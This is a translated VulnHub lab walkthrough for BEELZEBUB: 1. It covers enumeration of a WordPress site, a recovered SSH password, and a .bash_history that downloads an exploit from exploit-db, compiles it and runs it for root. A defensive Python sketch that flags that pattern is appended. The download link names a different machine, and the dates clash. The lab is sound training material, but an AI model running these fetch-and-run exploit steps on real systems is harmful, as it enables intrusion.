VulnHub walkthrough notes (BEELZEBUB: 1)

信息安全不简单鸭 2024-05-16 02:29:13

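English name: BEELZEBUB: 1
Chinese name: 别西卜:1
Release date: September 8, 2021
Difficulty: Easy
Description: You must enumerate as much as possible, and don't forget Base64.
Download: https://www.vulnhub.com/entry/empire-breakout,751/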

ailx10


1. The boot screen reveals the username (krampus)

2. Host discovery (192.168.199.146)

3. Port scan (ports 22 and 80)

4. View the web page

5. Scan directories with either of:

    dirb http://192.168.199.146/
    dirsearch -u http://192.168.199.146/

6. Visit the index page

Viewing the source of the index page gives a clue:

<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->

7. Compute the MD5 hash of beelzebub

    └─# echo -n 'beelzebub'|md5sum|cut -d ' ' -f1
    d18e1e22becbd915b45e0e655429d487

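8. Try accessing the link; it is answered with a 301 redirect. This looks like a WordPress site.

9. Enumerate the directory; this confirms it is a WordPress site

    dirsearch -u http://192.168.199.146/d18e1e22becbd915b45e0e655429d487/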

10. Try accessing uploads

Click "talk to valak"

Those who make a pact sometimes try to outwit the devil, but in the end they still fail.

11. Analyze the request with Burp and obtain the password M4k3Ad3a1

12. Try logging in over SSH

13. Successfully obtain the regular user's flag

14. Look for clues (.bash_history)

    krampus@beelzebub:~$ ls -la
    total 104
    drwsrwxrwx 17 krampus krampus  4096 Mar 20  2021 .
    drwxr-xr-x  3 root    root     4096 Mar 16  2021 ..
    -rw-------  1 krampus krampus  1407 Mar 20  2021 .bash_history
    drwx------ 11 krampus krampus  4096 Mar 20  2021 .cache
    drwxrwxrwx 14 krampus krampus  4096 May 26  2020 .config
    drwxrwxrwx  3 krampus krampus  4096 Oct 20  2019 .dbus
    drwxrwxrwx  2 krampus krampus  4096 Mar 19  2021 Desktop
    drwxrwxrwx  2 krampus krampus  4096 Apr  8  2020 Documents
    drwxrwxrwx  2 krampus krampus  4096 Mar 19  2021 Downloads
    drwxrwxrwx  3 krampus krampus  4096 Oct 20  2019 .gnupg
    drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 .gvfs
    -rwxrwxrwx  1 krampus krampus 12844 Mar 20  2021 .ICEauthority
    drwxr-xr-x  3 krampus krampus  4096 Mar 19  2021 .local
    drwxrwxrwx  5 krampus krampus  4096 Apr  2  2020 .mozilla
    drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 Music
    drwxrwxrwx  2 krampus krampus  4096 Oct 21  2019 Pictures
    -rwxrwxrwx  1 krampus krampus   807 Oct 20  2019 .profile
    drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 Public
    -rwxrwxrwx  1 krampus krampus    66 Oct 20  2019 .selected_editor
    -rw-rw-r--  1 krampus krampus    83 May 26  2020 .Serv-U-Tray.conf
    -rwxrwxrwx  1 krampus krampus     0 Oct 20  2019 .sudo_as_admin_successful
    drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 Templates
    drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 Videos
    -rw-rw-r--  1 krampus krampus   173 Mar 20  2021 .wget-hsts

15. View the history

    krampus@beelzebub:~$ cat .bash_history
    mysql -u root -p
    clear
    su root
    clear
    lks
    ls
    clear
    nano /etc/host
    nano /etc/hosts
    su root
    su root
    rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip
    su root
    clear
    exit
    chmod 0750 html/
    ifconfig
    cd /var/lib/mysql/
    clear
    ls
    cd wordpress/
    sudo su
    su root
    clear
    ls
    cd Desktop/
    clear
    ls
    cat user.txt
    clear
    uname -a
    sudo -1
    sudo -i
    clear
    uname -a
    sudo -i
    find / -prem -u=s -type f 2>/dev/null
    find / -prem -u=s -type f 2>/dev/null
    cat /etc/issue
    sudo -l
    cd
    cd ../
    cd ../../../../
    clear
    find / -prem -u=s -type f 2>/dev/null
    cd /usr/local/Serv-U/
    ls
    cd
    clear
    ps -aux
    ps -a
    ps -a -U root
    ps -a -U root | grep 'Serv'
    ps -U root -au
    ps -U root -au | sort -u
    clear
    cd /tmp/
    clear
    find / -prem -u=s -type f 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    clear
    find / -perm -u=s -type f 2>/dev/null
    clear
    wget https://www.exploit-db.com/download/47009
    clear
    ls
    clear
    mv 47009 ./exploit.c
    gcc exploit.c -o exploit
    ./exploit
    cd ../../../../../../../
    ls
    cd cd
    cd
    grep -r 'beelzebub'
    grep -r 'love'
    cd .local/share
    clear
    ls
    cd Trash/
    ls
    cat info
    cd info
    ls
    ls -la
    cd ../
    clear
    cd ../
    ls
    rm -rf Trash/
    clear
    su root
    history -R
    history -r
    mysql -u root -p
    clear
    su root
    clear
    lks
    ls
    clear
    nano /etc/host
    nano /etc/hosts
    su root
    su root
    rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip
    su root
    clear
    exit
    history
    clear
    cd
    clear
    ip link
    su root
    clear
    ls
    history
    clear
    ls
    cd /tmp/
    ls
    su root
    exit
    clear

16. Following the hints in .bash_history, complete the privilege escalation and obtain root's flag
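
Seen from the detection side, the .bash_history in step 15 records SUID enumeration followed by a download, compile and run sequence. The Python sketch below is an added example, not part of the original write-up, that flags that pattern in a shell history; the function name `triage`, the finding strings and the excerpted sample input are constructed for illustration.

```python
import os
import re
import shlex

# Constructed sample: commands excerpted from the .bash_history shown in step 15.
SAMPLE_HISTORY = """\
find / -perm -u=s -type f 2>/dev/null
wget https://www.exploit-db.com/download/47009
clear
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
"""

# `find / ... -perm -u=s` (or the octal 4000 forms) lists setuid binaries.
SUID_ENUM = re.compile(r"^find\s+/\s.*-perm\s+(-u=s|[-/]?0?4000)\b")

def _name(path):
    return os.path.basename(path.rstrip("/"))

def triage(history):
    """Flag SUID enumeration and download -> compile -> execute chains."""
    findings = []
    tainted = {}  # file name -> URL it was downloaded (or built) from
    for n, line in enumerate(history.splitlines(), 1):
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: fall back to a plain split
            argv = line.split()
        if not argv:
            continue
        cmd, args = _name(argv[0]), argv[1:]
        if SUID_ENUM.match(line):
            findings.append(f"{n}: SUID enumeration")
        elif cmd == "wget":
            for url in (a for a in args if a.startswith(("http://", "https://"))):
                tainted[_name(url)] = url
        elif cmd in ("mv", "cp") and len(args) == 2 and _name(args[0]) in tainted:
            tainted[_name(args[1])] = tainted[_name(args[0])]  # follow renames
        elif cmd in ("gcc", "cc") and "-o" in args[:-1]:
            srcs = [a for a in args if _name(a) in tainted]
            if srcs:
                tainted[_name(args[args.index("-o") + 1])] = tainted[_name(srcs[0])]
                findings.append(f"{n}: compiled downloaded source {srcs[0]}")
        elif "/" in argv[0] and _name(argv[0]) in tainted:
            findings.append(f"{n}: executed binary built from {tainted[_name(argv[0])]}")
    return findings

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_HISTORY)))
```

The mistyped `-prem` attempts in the history are not flagged, since `find` rejects them and they enumerate nothing.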


That completes the lab.

Published 2022-08-22 21:46
